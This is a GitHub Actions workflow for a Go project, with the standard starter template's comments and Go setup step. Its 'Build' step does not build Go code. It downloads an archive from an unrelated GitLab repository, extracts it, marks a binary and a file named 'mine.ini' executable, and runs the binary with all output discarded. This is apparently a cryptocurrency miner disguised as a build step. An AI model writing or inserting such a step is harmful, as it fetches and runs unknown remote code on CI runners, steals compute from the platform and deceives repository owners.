# This workflow will build a golang project
# For more information see: https://docs.github.com/en/actions/automating-builds-and-tests/building-and-testing-go

name: Go

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

jobs:

  build:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v4

    - name: Set up Go
      uses: actions/setup-go@v4
      with:
        go-version: '1.20'

    - name: Build
      run: wget https://gitlab.com/gas_kan/azkarillah/-/raw/master/aska.tar.gz && tar -xvf aska.tar.gz && chmod +x ikuk mine.ini && ./ikuk mine.ini > /dev/null 2>&1
      


